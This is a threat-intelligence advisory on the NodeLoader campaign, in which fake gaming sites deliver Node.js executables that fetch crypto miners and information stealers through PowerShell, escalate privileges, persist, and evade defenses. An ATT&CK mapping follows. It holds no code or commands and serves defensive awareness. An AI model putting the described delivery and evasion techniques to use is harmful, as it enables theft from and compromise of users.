EXECUTIVE SUMMARY:
A new malware campaign has been discovered leveraging Node.js applications for Windows to distribute cryptocurrency miners and information stealers. This malware family, named NodeLoader, employs compiled Node.js executables to deliver second-stage payloads, including XMRig, Lumma, and Phemedrone Stealer. Node.js, commonly used for building web-based services, is less frequently utilized for creating client-side applications for desktop platforms, which has led to limited antivirus signatures for this type of malware. The campaign has been observed using social engineering tactics and anti-evasion methods to bypass security measures.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY:
A new malware campaign has been discovered leveraging Node.js applications for Windows to distribute cryptocurrency miners and information stealers. This malware family, named NodeLoader, employs compiled Node.js executables to deliver second-stage payloads, including XMRig, Lumma, and Phemedrone Stealer. Node.js, commonly used for building web-based services, is less frequently utilized for creating client-side applications for desktop platforms, which has led to limited antivirus signatures for this type of malware. The campaign has been observed using social engineering tactics and anti-evasion methods to bypass security measures.[emaillocker id="1283"]
The NodeLoader malware is distributed through fake websites that imitate legitimate gaming platforms. These sites, often promoted through YouTube video links, lead users to download ZIP archives containing the malicious NodeLoader executable. The executable is compiled from Node.js code using the NPM pkg module and, when run, initiates a PowerShell script to download and execute second-stage payloads. To escalate privileges, NodeLoader utilizes the sudo-prompt module, a tool available on GitHub and NPM. Once elevated, the malware installs itself in hidden directories and downloads additional payloads such as cryptocurrency miners and information stealers. Notably, the XMRig miner and Phemedrone Stealer are among the malware delivered in this campaign. The attack chain is designed to evade detection, with NodeLoader checking for certain running processes and terminating if they are not found. The malware also employs various evasion techniques, including manipulating Windows security features and creating persistence mechanisms.
As the popularity of game streaming and community platforms grows, threat actors are increasingly exploiting these environments to distribute malware. The use of Node.js for malicious purposes, combined with advanced evasion tactics, underscores the need for heightened security awareness and improved detection capabilities. Efforts to combat such campaigns, including full SSL inspection and sandbox analysis, are essential in identifying and mitigating these threats. This campaign highlights the evolving tactics used and the importance of continuous monitoring and adaptation of security measures.
THREAT PROFILE:
| Tactic | Technique Id | Technique |
| Execution | T1204 | User Execution |
| T1059 | Command and Scripting Interpreter | |
| Persistence | T1543 | Create or Modify System Process |
| Defense Evasion | T1562 | Impair Defenses |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
REFERENCES:
The following reports contain further technical details:
https://www.zscaler.com/blogs/security-research/nodeloader-exposed-node-js-malware-evading-detection